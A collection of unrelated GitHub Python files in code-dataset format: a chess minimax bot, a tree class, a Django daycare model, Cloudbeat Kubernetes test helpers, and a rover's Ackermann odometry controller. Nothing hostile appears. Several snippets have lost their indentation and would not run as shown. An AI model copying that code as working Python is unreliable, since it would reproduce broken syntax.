worstResult = -1000 if side == "Black" else 1000
        # Find the worst outcome among the enemy's answers
for possibleMove in possibleSituations:
if side == "Black" and possibleSituations[possibleMove] > worstResult:
worstResult = possibleSituations[possibleMove]
elif side == "White" and possibleSituations[possibleMove] < worstResult:
worstResult = possibleSituations[possibleMove]
else:
... # Same outcome
return worstResult
import chess.pgn
board = chess.Board()
if input("Type of game (b - bots, r - real): ").upper() == 'B':
game = chess.pgn.Game()
game.headers["Event"] = "Bot test"
game.headers["White"] = "White bot power 3"
game.headers["Black"] = "Black bot power 3"
game.setup(board)
node = game
print("Starting...")
def Split(s):
res = ""
leftUntilSpace = 2
for character in s:
        if not leftUntilSpace:
            res += " "
            leftUntilSpace = 2  # reset the counter so a space follows every pair
        res += character
        leftUntilSpace -= 1
return res
while board.outcome() == None:
try:
move = CheckForResult(board, 4, True, "White")
print(str(move[0]) + ",", \
"good material" if not move[1] \
else ("White is winning by " + str(abs(move[1]))) if move[1] > 0 \
else ("Black is winning by " + str(abs(move[1]))))
print(" Possible moves found:", len(list(board.legal_moves)))
board.push_san(str(move[0]))
node = node.add_variation(move[0])
move = CheckForResult(board, 3, True, "Black")
print(str(move[0]) + ",", \
"good material" if not move[1] \
else ("White is winning by " + str(abs(move[1]))) if move[1] > 0 \
else ("Black is winning by " + str(abs(move[1]))))
print(" Possible moves found:", len(list(board.legal_moves)))
board.push_san(str(move[0]))
# recording += board.fen()
node = node.add_variation(move[0])
print(board)
except Exception as e:
print(e)
break
else:
...
else:
while board.outcome() == None:
possibleMoves = len(list(board.legal_moves))
if possibleMoves >= 19: move = CheckForResult(board, 3, True, "White")
else: move = CheckForResult(board, 4, True, "White")
print(str(move[0]))# + ",", \
# "good material" if not move[1] \
# else ("White is winning by " + str(abs(move[1]))) if move[1] > 0 \
# else ("Black is winning by " + str(abs(move[1]))))
# print(" Possible moves found:", len(list(board.legal_moves)))
board.push_san(str(move[0]))
move = input("> ")
while len(move) != 4:
print("Error: illegal move")
move = input("> ")
board.push_san(move)
print(board.outcome())
print(board.result())
print("\n\n\n", game)
```
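The long `elif` chain used for the material count can be written more compactly with a symbol-to-value table. A sketch of an equivalent evaluation (same piece values and sign convention, kings ignored; it is not wired into the bot above):
```python
import chess

# Equivalent material evaluation using a lookup table instead of the elif chain.
# Uppercase symbols are White (positive), lowercase are Black (negative).
PIECE_VALUES = {"P": 1, "N": 3, "B": 3, "R": 5, "Q": 9,
                "p": -1, "n": -3, "b": -3, "r": -5, "q": -9}

def material_balance(board: chess.Board) -> int:
    """Sum of piece values from White's point of view (kings count as 0)."""
    return sum(PIECE_VALUES.get(piece.symbol(), 0)
               for piece in board.piece_map().values())

print(material_balance(chess.Board()))  # 0 for the starting position
```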
|
{
"source": "JeniaD/Python-useful-scripts",
"score": 3
}
|
#### File: JeniaD/Python-useful-scripts/Binary trees.py
```python
class Node:
    def __init__(self, data, branchings=None):
        # Avoid a mutable default argument: each node gets its own list.
        self.branchings = branchings if branchings is not None else []
        self.data = data
    def AddBranch(self, object):
        self.branchings += [Node(object)]
    def AddBud(self, object):
        # Attach an already-constructed node/subtree.
        self.branchings.append(object)
```
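A short usage sketch of the class above (the data values are illustrative):
```python
# Build a small tree and read it back.
root = Node("root")
root.AddBranch("left child")           # wraps the value in a new Node
root.AddBranch("right child")
root.AddBud(Node("existing subtree"))  # attaches an already-built Node
print(root.data, [branch.data for branch in root.branchings])
# root ['left child', 'right child', 'existing subtree']
```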
|
{
"source": "jeniaSakirko/Hotails",
"score": 2
}
|
#### File: Hotails/daycare/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from .validators import validate_username_already_exist
from .validators import validate_max_length
from .validators import validate_price
from .validators import validate_url_is_image
from .validators import validate_if_daycare_exists
from django.core.validators import validate_email
from django.core.validators import MaxLengthValidator
from django.core.exceptions import ObjectDoesNotExist
class DayCare(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, default=None, blank=True, null=False, editable=True)
name = models.CharField(max_length=20, blank=True, unique=True, validators=[MaxLengthValidator])
description = models.TextField(blank=True, null=True)
price_per_day = models.IntegerField(blank=False, null=False, default=0)
capacity = models.IntegerField(null=False, blank=True)
area = models.CharField(max_length=20, blank=True, validators=[MaxLengthValidator])
city = models.CharField(max_length=20, blank=True, validators=[MaxLengthValidator])
address = models.CharField(max_length=50, blank=True, validators=[MaxLengthValidator])
def __str__(self):
return f'Daycare name: {self.name}'
@staticmethod
def get_daycare_by_id(daycare_id):
try:
            return DayCare.objects.filter(id=daycare_id)
except ObjectDoesNotExist:
return None
@staticmethod
def create(email, username, password, name, description, price_per_day, capacity, area, city, address):
validate_email(email)
validate_username_already_exist(username)
validate_max_length(name, 20, "name")
validate_max_length(area, 20, "area")
validate_max_length(city, 20, "city")
validate_max_length(address, 50, "address")
validate_price(price_per_day)
new_daycare = DayCare(user=User.objects.create_user(email=email, username=username, password=password),
name=name, description=description, price_per_day=price_per_day,
capacity=capacity, area=area, city=city, address=address)
new_daycare.user.save()
new_daycare.save()
return new_daycare
def get_daycare_primary_image_url(self):
daycare_images = Image.get_images_by_daycare_id(daycare_id=self.id)
if daycare_images is not None and daycare_images.first() is not None:
return daycare_images.first().url
return "../../static/images/daycare-default-profile-image.jpeg"
class Image(models.Model):
url = models.CharField(max_length=1000)
daycare_id = models.ForeignKey(DayCare, on_delete=models.CASCADE,
default=None, blank=True, null=False, editable=True)
@classmethod
def create(cls, url, daycare_id):
validate_url_is_image(url)
validate_if_daycare_exists(daycare_id.id)
new_image = Image(url=url, daycare_id=daycare_id)
new_image.save()
return new_image
@staticmethod
def get_images_by_daycare_id(daycare_id):
try:
return Image.objects.filter(daycare_id=daycare_id)
except ObjectDoesNotExist:
return None
```
|
{
"source": "jeniawhite/cloudbeat",
"score": 3
}
|
#### File: tests/commonlib/elastic_wrapper.py
```python
from elasticsearch import Elasticsearch
class ElasticWrapper:
"""
Wrapper that uses elasticsearch official package
"""
def __init__(self, elastic_params):
self.index = elastic_params.cis_index
self.es = Elasticsearch(hosts=elastic_params.url,
basic_auth=elastic_params.basic_auth)
def get_index_data(self, index_name: str, query: dict = None):
result = self.es.search(index=index_name, body=query)
return result
```
#### File: tests/commonlib/io_utils.py
```python
import os
import io
import json
import yaml
import shutil
from pathlib import Path
from munch import Munch, munchify
def get_logs_from_stream(stream: str) -> list[Munch]:
"""
This function converts logs stream to list of Munch objects (dictionaries)
@param stream: StringIO stream
@return: List of Munch objects
"""
logs = io.StringIO(stream)
result = []
for log in logs:
if log and "bundles" in log:
try:
result.append(munchify(json.loads(log)))
except json.decoder.JSONDecodeError:
result.append(munchify(json.loads(log.replace("'", '"'))))
except Exception as e:
print(e)
continue
return result
def get_k8s_yaml_objects(file_path: Path) -> list[dict]:
"""
This function loads yaml file, and returns the following list:
[ {<k8s_kind> : {<k8s_metadata}}]
:param file_path: YAML path
:return: [ {<k8s_kind> : {<k8s_metadata}}]
"""
if not file_path:
raise Exception(f'{file_path} is required')
result_list = []
with file_path.open() as yaml_file:
yaml_objects = yaml.safe_load_all(yaml_file)
for yml_doc in yaml_objects:
if yml_doc:
doc = Munch(yml_doc)
result_list.append({
doc.get('kind'): {key: value for key, value in doc.get('metadata').items()
if key in ['name', 'namespace']}
})
return result_list
class FsClient:
@staticmethod
def exec_command(container_name: str, command: str, param_value: str, resource: str):
"""
This function executes os command
@param container_name: Container node
@param command: Linux command to be executed
@param param_value: Value to be used in exec command
@param resource: File / Resource path
@return: None
"""
if command == 'touch':
if os.path.exists(param_value):
return
else:
open(param_value, "a+")
return
# if command == 'getent' and param_value == 'group':
# try:
# grp.getgrnam(param_value)
# return ['etcd']
# except KeyError:
# return []
#
# if command == 'getent' and param_value == 'passwd':
# try:
# pwd.getpwnam(param_value)
# return ['etcd']
# except KeyError:
# return []
#
# if command == 'groupadd' and param_value == 'etcd':
# try:
# grp.getgrnam(param_value)
# return ['etcd']
# except KeyError:
# return []
if container_name == '':
raise Exception("Unknown container name is sent")
current_resource = Path(resource)
if not current_resource.is_file():
raise Exception(
f"File {resource} does not exist or mount missing.")
if command == 'chmod':
os.chmod(path=resource, mode=int(param_value))
elif command == 'chown':
uid_gid = param_value.split(':')
if len(uid_gid) != 2:
raise Exception(
"User and group parameter shall be separated by ':' ")
shutil.chown(path=resource, user=uid_gid[0], group=uid_gid[1])
else:
raise Exception(
f"Command '{command}' still not implemented in test framework")
@staticmethod
def edit_process_file(container_name: str, dictionary, resource: str):
"""
This function edits a process file
@param container_name: Container node
@param dictionary: Process parameters to set/unset
@param resource: File / Resource path
@return: None
"""
if container_name == '':
            raise Exception("Unknown container name is sent")
current_resource = Path(resource)
if not current_resource.is_file():
raise Exception(
f"File {resource} does not exist or mount missing.")
# Open and load the YAML into variable
with current_resource.open() as f:
r_file = yaml.safe_load(f)
# Get process configuration arguments
command = r_file["spec"]["containers"][0]["command"]
# Collect set/unset keys and values from the dictionary
set_dict = dictionary.get("set", {})
unset_list = dictionary.get("unset", [])
# Cycle across set items from the dictionary
for skey, svalue in set_dict.items():
# Find if set key exists already in the configuration arguments
if any(skey == x.split("=")[0] for x in command):
# Replace the value of the key with the new value from the set items
command = list(map(lambda x: x.replace(
x, skey + "=" + svalue) if skey == x.split("=")[0] else x, command))
else:
# In case of non existing key in the configuration arguments, append the key/value from set items
command.append(skey + "=" + svalue)
# Cycle across unset items from the dictionary
for uskey in unset_list:
# Filter out the unset keys from the configuration arguments
command = [x for x in command if uskey != x.split("=")[0]]
        # Override the configuration arguments with the newly built ones
r_file["spec"]["containers"][0]["command"] = command
# Write the newly build configuration arguments
with current_resource.open(mode="w") as f:
yaml.dump(r_file, f)
@staticmethod
def edit_config_file(container_name: str, dictionary, resource: str):
"""
This function edits a config file
@param container_name: Container node
@param dictionary: Config parameters to set/unset
@param resource: Config path
@return: None
"""
if container_name == '':
raise Exception("Unknown container name is sent")
current_resource = Path(resource)
if not current_resource.is_file():
raise Exception(
f"File {resource} does not exist or mount missing.")
# Open and load the YAML into variable
with current_resource.open() as f:
r_file = yaml.safe_load(f)
# Collect set/unset keys and values from the dictionary
set_dict = dictionary.get("set", {})
unset_list = dictionary.get("unset", [])
        # Shallow-merge the two dictionaries, with priority for the set items
        r_file = {**r_file, **set_dict}
# Cycle across unset items from the dictionary
for uskey in unset_list:
# Parsed dot separated key values
keys = uskey.split('.')
key_to_del = keys.pop()
p = r_file
# Advance inside the dictionary for nested keys
for key in keys:
p = p.get(key, None)
if p is None:
# Non existing nested key
break
# Remove nested keys when all path exists
if p:
del p[key_to_del]
# Write the newly build config
with current_resource.open(mode="w") as f:
yaml.dump(r_file, f)
```
#### File: cloudbeat/tests/conftest.py
```python
import pytest
import configuration
from commonlib.kubernetes import KubernetesHelper
from commonlib.elastic_wrapper import ElasticWrapper
from commonlib.docker_wrapper import DockerWrapper
from commonlib.io_utils import FsClient
@pytest.fixture(scope="session", autouse=True)
def k8s():
"""
This function (fixture) instantiates KubernetesHelper depends on configuration.
When executing tests code local, kubeconfig file is used for connecting to K8s cluster.
When code executed as container (pod / job) in K8s cluster in cluster configuration is used.
@return: Kubernetes Helper instance.
"""
return KubernetesHelper(is_in_cluster_config=configuration.kubernetes.is_in_cluster_config)
@pytest.fixture(scope="session", autouse=True)
def cloudbeat_agent():
"""
This function (fixture) retrieves agent configuration, defined in configuration.py file.
@return: Agent config
"""
return configuration.agent
@pytest.fixture(scope="session", autouse=True)
def elastic_client():
"""
This function (fixture) instantiate ElasticWrapper.
@return: ElasticWrapper client
"""
elastic_config = configuration.elasticsearch
es_client = ElasticWrapper(elastic_params=elastic_config)
return es_client
@pytest.fixture(scope="session", autouse=True)
def api_client():
"""
This function (fixture) instantiates client depends on configuration.
For local development mode, the docker api may be used.
For production mode (deployment to k8s cluster), FsClient shall be used.
@return: Client (docker / FsClient).
"""
docker_config = configuration.docker
print(f"Config use_docker value: {docker_config.use_docker}")
if docker_config.use_docker:
client = DockerWrapper(config=docker_config)
else:
client = FsClient
return client
```
#### File: product/tests/test_kube_api_rules.py
```python
from datetime import datetime
import pytest
from commonlib.utils import get_evaluation, get_resource_identifier
from product.tests.kube_rules import cis_5_1_5
@pytest.mark.rules
@pytest.mark.parametrize(
("rule_tag", "resource_type", "resource_body", "expected"),
[
*cis_5_1_5.values(),
],
ids=[
*cis_5_1_5.keys(),
]
)
def test_kube_resource_patch(setup_busybox_pod, rule_tag, resource_type, resource_body, expected):
"""
Test kube resource
@param setup_busybox_pod: pre step that set-ups a busybox pod to test on
@param rule_tag: rule tag in the CIS benchmark
@param resource_type: kube resource type, e.g., Pod, ServiceAccount, etc.
@param resource_body: a dict to represent the relevant properties of the resource
@param expected: "failed" or "passed"
"""
k8s_client, _, agent_config = setup_busybox_pod
# make sure resource exists
resource_name = resource_body["metadata"]["name"]
resource = k8s_client.get_resource(
resource_type=resource_type,
name=resource_name,
namespace=agent_config.namespace
)
assert resource, f"Resource {resource_type} not found"
# patch resource
k8s_client.patch_resources(
name=resource_name,
resource_type=resource_type,
namespace=agent_config.namespace,
body=resource_body,
)
# check resource evaluation
pods = k8s_client.get_agent_pod_instances(agent_name=agent_config.name, namespace=agent_config.namespace)
evaluation = get_evaluation(
k8s=k8s_client,
timeout=agent_config.findings_timeout,
pod_name=pods[0].metadata.name,
namespace=agent_config.namespace,
rule_tag=rule_tag,
exec_timestamp=datetime.utcnow(),
resource_identifier=get_resource_identifier(resource_body)
)
assert evaluation == expected, f"Rule {rule_tag} verification failed. expected: {expected} actual: {evaluation}"
```
|
{
"source": "jenicek/asmk",
"score": 3
}
|
#### File: asmk/asmk/functional.py
```python
import numpy as np
def normalize_vec_l2(vecs):
"""Perform l2 normalization on each vector in a given matrix (axis 1)"""
norm = np.linalg.norm(vecs, ord=2, axis=1, keepdims=True) + 1e-6
return vecs / norm
def asmk_kernel(sim, image_ids, *, alpha, similarity_threshold):
"""Compute scores for visual words"""
mask = (sim>=similarity_threshold)
sim = np.power(sim[mask], alpha) # monomial kernel
return image_ids[mask], sim
```
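A small sketch of what `asmk_kernel` does with a batch of matches: similarities below the threshold are dropped, the rest are raised to the power `alpha` and returned together with the image ids they vote for (the numbers below are made up):
```python
import numpy as np

# Illustrative inputs: similarities of one query descriptor against indexed
# descriptors, and the image id each indexed descriptor belongs to.
sim = np.array([0.9, 0.2, 0.55, -0.1])
image_ids = np.array([3, 7, 7, 12])

ids, weights = asmk_kernel(sim, image_ids, alpha=3.0, similarity_threshold=0.5)
print(ids)      # [3 7]               -- only matches above the threshold survive
print(weights)  # [0.729    0.166375] -- similarities raised to the power alpha
```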
#### File: asmk/asmk/io_helpers.py
```python
import os.path
import time
import sys
import logging
import pickle
import urllib.request
from io import StringIO
from pathlib import Path
import yaml
import numpy as np
# Params
def load_params(path):
"""Return loaded parameters from a yaml file"""
with open(path, "r") as handle:
content = yaml.safe_load(handle)
if "__template__" in content:
# Treat template as defaults
template_path = os.path.expanduser(content.pop("__template__"))
template = load_params(os.path.join(os.path.dirname(path), template_path))
content = dict_deep_overlay(template, content)
return content
def dict_deep_overlay(defaults, params):
"""If defaults and params are both dictionaries, perform deep overlay (use params value for
keys defined in params, otherwise use defaults value)"""
if isinstance(defaults, dict) and isinstance(params, dict):
for key in params:
defaults[key] = dict_deep_overlay(defaults.get(key, None), params[key])
return defaults
return params
# Logging
def init_logger(log_path):
"""Return a logger instance which logs to stdout and, if log_path is not None, also to a file"""
logger = logging.getLogger("ASMK")
logger.setLevel(logging.DEBUG)
stdout_handler = logging.StreamHandler()
stdout_handler.setLevel(logging.INFO)
stdout_handler.setFormatter(logging.Formatter('%(name)s %(levelname)s: %(message)s'))
logger.addHandler(stdout_handler)
if log_path:
file_handler = logging.FileHandler(log_path)
file_handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s: %(message)s')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
def progress(iterable, *, size=None, frequency=1, header=""):
"""Generator that wraps an iterable and prints progress"""
if size is None:
size = len(iterable)
header = f"{header.capitalize()}: " if header else ""
charsize = len(str(size))
if frequency:
print(f"{header}[{'0'.rjust(charsize)}/{size}]", end=" ")
sys.stdout.flush()
time0 = time.time()
for i, element in enumerate(iterable):
yield element
i1 = i+1
if frequency and (i1 % frequency == 0 or i1 == size):
avg_time = (time.time() - time0) / i1
print(f"\r{header}[{str(i1).rjust(charsize)}/{size}] " \
f"elapsed {int(avg_time*i1/60):02d}m/{int(avg_time*size/60):02d}m", end=" ")
sys.stdout.flush()
if frequency:
print()
def capture_stdout(func, logger):
"""Redirect stdout to logger"""
sys.stdout, stdout = StringIO(), sys.stdout
func()
sys.stdout, out_text = stdout, sys.stdout.getvalue()
for line in out_text.strip().split("\n"):
logger.info(line)
# Load and save state dicts
def load_pickle(path):
"""Load pickled data from path"""
with open(path, 'rb') as handle:
return pickle.load(handle)
def save_pickle(path, data):
"""Save data to path using pickle"""
with open(path, 'wb') as handle:
pickle.dump(data, handle)
# Download
def download_files(names, root_path, base_url, logfunc=None):
"""Download file names from given url to given directory path. If logfunc given, use it to log
status."""
root_path = Path(root_path)
for name in names:
path = root_path / name
if path.exists():
continue
if logfunc:
logfunc(f"Downloading file '{name}'")
path.parent.mkdir(parents=True, exist_ok=True)
urllib.request.urlretrieve(base_url + name, path)
# Iteration
def slice_unique(ids):
"""Generate slices that mark a sequence of identical values in a given array of ids. The
sequence must be uninterrupted (compact)."""
pointer = 0
for i, counts in zip(*np.unique(ids, return_counts=True)):
seq = slice(pointer, pointer+counts)
assert (ids[seq] == i).all()
yield i, seq
pointer += counts
```
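A short example of the template overlay performed by `load_params`/`dict_deep_overlay`: values defined in `params` win, everything else falls back to the template (the keys below are illustrative, not the actual parameter schema):
```python
# Deep overlay: params override the template only where they define a value.
template = {"index": {"type": "ivf", "k": 1024}, "alpha": 3.0}
params = {"index": {"k": 65536}}
merged = dict_deep_overlay(template, params)
print(merged)  # {'index': {'type': 'ivf', 'k': 65536}, 'alpha': 3.0}
```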
|
{
"source": "Jenifen/curio",
"score": 2
}
|
#### File: src/curio_base/base_controller.py
```python
ENABLE_ARDUINO_LX16A_DRIVER = True
if ENABLE_ARDUINO_LX16A_DRIVER:
# Load imports for the Arduino driver
from curio_msgs.msg import CurioServoCommands
from curio_msgs.msg import CurioServoPositions
else:
# Load imports for the Python serial driver
from curio_base.lx16a_driver import LX16ADriver
from curio_msgs.msg import CurioServoStates
from curio_msgs.msg import LX16AState
from curio_base.lx16a_encoder_filter import LX16AEncoderFilter
from curio_msgs.msg import CurioServoEncoders
from curio_msgs.msg import LX16AEncoder
import math
import rospy
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseWithCovariance
from geometry_msgs.msg import Twist
from geometry_msgs.msg import TwistWithCovariance
from nav_msgs.msg import Odometry
from tf.transformations import quaternion_from_euler
from tf import TransformBroadcaster
def degree(rad):
    ''' Convert an angle in radians to degrees
Parameters
----------
rad : float
An angle in radians
Returns
-------
float
The angle in degrees.
'''
return rad * 180.0 / math.pi
def radian(deg):
    ''' Convert an angle in degrees to radians
Parameters
----------
deg : float
An angle in degrees
Returns
-------
float
The angle in radians.
'''
return deg * math.pi / 180.0
def map(x, in_min, in_max, out_min, out_max):
''' Map a value in one range to its equivalent in another.
Parameters
----------
x : float
The value to be mapped
in_min : float
The minimum value the input variable can take.
in_max : float
The maximum value the input variable can take.
out_min : float
The minimum value the output variable can take.
out_max : float
The maximum value the output variable can take.
Returns
-------
float
The mapped value.
'''
return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
def clamp(x, lower, upper):
''' Clamp a value between a lower and upper bound.
Parameters
----------
x : float
The value to be clamped
    lower : float
        The lower limit of the clamp.
    upper : float
        The upper limit of the clamp.
Returns
-------
float
The clamped value.
'''
return min(max(x, lower), upper)
def caseless_equal(left, right):
''' A case insensitive comparison.
Parameters
----------
left : str
A string to compare.
right : str
A string to compare.
Returns
-------
bool
Return True if the strings are equal ignoring case.
'''
return left.upper() == right.upper()
def turning_radius_and_rate(v_b, omega_b, d):
''' Calculate the turning radius and rate of turn about
the instantaneous centre of curvature (ICC).
Conventions are specifiied according to ROS REP 103:
Standard Units of Measure and Coordinate Conventions
https://www.ros.org/reps/rep-0103.html.
x : forward
y : left
z : up
Example
-------
v_b >= 0, omega_b > 0 => r_p > 0 positive turn (anti-clockwise),
v_b >= 0, omega_b < 0 => r_p < 0 negative turn (clockwise),
v_b >= 0, omega_b = 0 => r_p = inf no turn.
Parameters
----------
v_b : float
The linear velocity of the base [m/s].
omega_b : float
The angular velocity of the base [rad/s].
d : float
distance between the fixed wheels [m].
Returns
-------
list
A two element list containing r_p the turning radius [m]
and and omega_p the rate of turn [rad/s]. If the motion
has no angular component then r_p is float('Inf') and
omega_p is zero.
'''
vl = v_b - d * omega_b / 2.0
vr = v_b + d * omega_b / 2.0
if vl == vr:
return float('Inf'), 0.0
else:
r_p = d * (vr + vl) / (vr - vl) / 2.0
omega_p = (vr - vl) / d
return r_p, omega_p
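# Worked example (illustrative values, not taken from the robot's configuration):
# with v_b = 0.2 m/s, omega_b = 0.5 rad/s and d = 0.52 m,
#   vl = 0.2 - 0.52 * 0.5 / 2 = 0.07 m/s
#   vr = 0.2 + 0.52 * 0.5 / 2 = 0.33 m/s
#   r_p = 0.52 * (0.33 + 0.07) / (0.33 - 0.07) / 2 = 0.4 m   (= v_b / omega_b)
#   omega_p = (0.33 - 0.07) / 0.52 = 0.5 rad/s               (= omega_b)
# i.e. turning_radius_and_rate(0.2, 0.5, 0.52) returns (0.4, 0.5),
# up to floating-point rounding.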
class MeanWindowFilter(object):
''' Simple rolling window filter.
'''
def __init__(self, window=5):
''' Constructor
Parameters
----------
window : int
The size of the rolling window, has (default 5)
'''
self._window = window
self._index = 0
self._buffer = [0.0 for i in range(window)]
self._sum = 0.0
self._mean = 0.0
def update(self, value):
''' Update the filter with the the next value.
Parameters
----------
value : float
The next value to accumulate in the filter.
'''
# Update the ring buffer
self._index = (self._index + 1) % self._window
old_value = self._buffer[self._index]
self._buffer[self._index] = value
# Update the stats
self._sum = self._sum + value - old_value
self._mean = self._sum / self._window
def get_mean(self):
''' Get the rolling mean
Returns
-------
float
The rolling mean
'''
return self._mean
def get_window(self):
''' Get the size of the rolling window
Returns
-------
int
The size of the rolling window
'''
return self._window
class Servo(object):
'''Servo properties.
Store information about the servo.
Attributes
----------
id : int
servo serial id: 0 - 253.
lon_label : int
Enumeration label for the longitudinal direction:
FRONT, MID, BACK.
lat_label : int
Enumeration label for the lateral direction: LEFT, RIGHT.
orientation : int
Flag to indicate whether the servo is installed for positive
        or negative rotation: 1, -1.
offset : int
The servo position offset (for servo rather than motor mode).
Use to centre servos.
position : list
List servo position in the robot base. Two dimensional
coordinate vector of floats.
'''
# Lateral labels
LEFT = 0
RIGHT = 1
# Longitudinal labels
FRONT = 2
MID = 3
BACK = 4
def __init__(self, id, lon_label, lat_label, orientation):
''' Constructor
Parameters
----------
id : int
servo serial id: 0 - 253.
lon_label : str
Label for the longitudinal direction:
'front', 'mid', 'back'.
lat_label : str
Label for the lateral direction: 'left', 'right'.
orientation : int
Flag to indicate whether the servo is installed for positive
            or negative rotation: 1, -1.
'''
self.id = id
self.lon_label = lon_label
self.lat_label = lat_label
self.orientation = orientation
self.offset = 0.0
self.position = [0.0, 0.0]
@staticmethod
def to_lat_label(label_str):
        ''' Convert a lateral label string to an enumerated value.
Parameters
----------
label_str : str
Label for the lateral direction: 'left', 'right'.
Returns
-------
int
Enumeration label for the lateral direction:
LEFT, RIGHT.
'''
if caseless_equal(label_str, 'LEFT'):
return Servo.LEFT
if caseless_equal(label_str, 'RIGHT'):
return Servo.RIGHT
else:
return -1
@staticmethod
def to_lon_label(label_str):
        ''' Convert a longitudinal label string to an enumerated value.
Parameters
----------
label_str : str
Label for the longitudinal direction:
'front', 'mid', 'back'.
Returns
-------
int :
Enumeration label for the longitudinal direction:
FRONT, MID, BACK.
'''
if caseless_equal(label_str, 'FRONT'):
return Servo.FRONT
if caseless_equal(label_str, 'MID'):
return Servo.MID
if caseless_equal(label_str, 'BACK'):
return Servo.BACK
else:
return -1
class AckermannOdometry(object):
''' Odometry for the base controller (6 wheel Ackermann)
This class based on its C++ equivalent in the
`ackermann_drive_controller` module which in turn was derived
from the `diff_drive_controller` in `ros_controllers`.
Original odometry code:
https://github.com/ros-controls/ros_controllers/diff_drive_controller
License: BSD-3-Clause
Copyright (c) 2013, PAL Robotics, S.L.
All rights reserved.
Authors
<NAME>
<NAME>
<NAME>
<NAME>
'''
def __init__(self, velocity_filter_window=10):
''' Constructor
Parameters
----------
velocity_filter_window : int
The size of the window used in the velocity filter,
has (default 10)
'''
self._timestamp = rospy.Time()
self._heading = 0.0 # [rad]
self._x = 0.0 # [m]
self._y = 0.0 # [m]
        self._lin_vel_filter = MeanWindowFilter(window=velocity_filter_window)  # [m/s]
        self._ang_vel_filter = MeanWindowFilter(window=velocity_filter_window)  # [rad/s]
self._wheel_radius = 0.06 # [m]
self._mid_wheel_lat_separation = 0.52 # [m]
self._wheel_radius_multiplier = 1.0 # [1]
self._mid_wheel_lat_separation_multiplier = 1.0 # [1]
self._num_wheels = 6
self._wheel_cur_pos = [0.0 for x in range(self._num_wheels)] # [m]
self._wheel_old_pos = [0.0 for x in range(self._num_wheels)] # [m]
self._wheel_est_vel = [0.0 for x in range(self._num_wheels)] # [m/s]
def reset(self, time):
''' Reset the odometry
Parameters
----------
time : rospy.Time
The current time.
'''
self._timestamp = time
def update_6(self, wheel_servo_pos, time):
''' Update the odometry with the latest wheel servo positions.
Parameters
----------
wheel_servo_pos : list
A list of 6 floats denoting the angular position of the
6 wheel servos [rad].
time : rospy.Time
The current time.
'''
# Adjust the wheel radius and separation by the calibrated multipliers
wheel_rad = self._wheel_radius * self._wheel_radius_multiplier
wheel_sep = self._mid_wheel_lat_separation * self._mid_wheel_lat_separation_multiplier
for i in range(self._num_wheels):
# Get the current wheel joint (linear) positions [m]
self._wheel_cur_pos[i] = wheel_servo_pos[i] * wheel_rad
# Estimate the velocity of the wheels using old and current positions
self._wheel_est_vel[i] = self._wheel_cur_pos[i] - self._wheel_old_pos[i]
# Update old position with current
self._wheel_old_pos[i] = self._wheel_cur_pos[i]
# @TODO - remove hardcoding and use a lookup instead
MID_RIGHT = 1
MID_LEFT = 4
# Compute linear and angular velocities of the mobile base (base_link frame)
lin_vel = (self._wheel_est_vel[MID_RIGHT] + self._wheel_est_vel[MID_LEFT]) * 0.5
ang_vel = (self._wheel_est_vel[MID_RIGHT] - self._wheel_est_vel[MID_LEFT]) / wheel_sep
# Integrate the velocities to get the linear and angular positions
self._integrate_velocities(lin_vel, ang_vel)
# Cannot estimate the speed for small time intervals
dt = (time - self._timestamp).to_sec()
if dt < 0.0001:
return False
# Estimate speeds using a rolling mean / mode to filter them
self._timestamp = time
# Add to velocity filters
self._lin_vel_filter.update(lin_vel/dt)
self._ang_vel_filter.update(ang_vel/dt)
return True
def update_2(self, wheel_servo_pos, time):
''' Update the odometry with the mid wheel servo positions.
Parameters
----------
wheel_servo_pos : list
A list of 2 floats denoting the angular position of the
2 mid wheel servos [rad]
time : rospy.Time
The current time.
'''
# Adjust the wheel radius and separation by the calibrated multipliers
wheel_rad = self._wheel_radius * self._wheel_radius_multiplier
wheel_sep = self._mid_wheel_lat_separation * self._mid_wheel_lat_separation_multiplier
for i in range(2):
# Get the current wheel joint (linear) positions [m]
self._wheel_cur_pos[i] = wheel_servo_pos[i] * wheel_rad
# Estimate the velocity of the wheels using old and current positions
self._wheel_est_vel[i] = self._wheel_cur_pos[i] - self._wheel_old_pos[i]
# Update old position with current
self._wheel_old_pos[i] = self._wheel_cur_pos[i]
LEFT = Servo.LEFT
RIGHT = Servo.RIGHT
# Compute linear and angular velocities of the mobile base (base_link frame)
lin_vel = (self._wheel_est_vel[RIGHT] + self._wheel_est_vel[LEFT]) * 0.5
ang_vel = (self._wheel_est_vel[RIGHT] - self._wheel_est_vel[LEFT]) / wheel_sep
# Integrate the velocities to get the linear and angular positions
self._integrate_velocities(lin_vel, ang_vel)
# Cannot estimate the speed for small time intervals
dt = (time - self._timestamp).to_sec()
if dt < 0.0001:
return False
# Estimate speeds using a rolling mean / mode to filter them
self._timestamp = time
# Add to velocity filters
self._lin_vel_filter.update(lin_vel/dt)
self._ang_vel_filter.update(ang_vel/dt)
return True
def get_heading(self):
''' Get the heading [rad]
        The heading in radians, with zero along the longitudinal
        axis (x) and positive rotation towards the positive lateral
        axis (y), i.e. to the left.
Returns
-------
float
The heading in radians.
'''
return self._heading
def get_x(self):
''' Get the x position [m]
Returns
-------
float
The x position [m].
'''
return self._x
def get_y(self):
''' Get the y position [m]
Returns
-------
float
The y position [m].
'''
return self._y
def get_lin_vel(self):
''' Get the linear velocity of the body [m/s]
Returns
-------
float
The linear velocity of the `base_link` [m/s].
'''
return self._lin_vel_filter.get_mean()
def get_ang_vel(self):
''' Get the angular velocity of the body [rad/s]
Returns
-------
float
The angular velocity of the `base_link` [rad/s].
'''
return self._ang_vel_filter.get_mean()
def set_wheel_params(self,
wheel_radius,
mid_wheel_lat_separation,
wheel_radius_multiplier=1.0,
mid_wheel_lat_separation_multiplier=1.0):
''' Set the wheel and steering geometry.
Note: all wheels are assumed to have the same radius, and the
mid wheels do not steer.
Parameters
----------
wheel_radius : float
The radius of the wheels [m].
mid_wheel_lat_separation : float
The lateral separation [m] of the mid wheels.
wheel_radius_multiplier : float
            Wheel radius calibration multiplier to tune odometry
            (default = 1.0).
        mid_wheel_lat_separation_multiplier : float
            Wheel separation calibration multiplier to tune odometry
            (default = 1.0).
'''
self._wheel_radius = wheel_radius
self._mid_wheel_lat_separation = mid_wheel_lat_separation
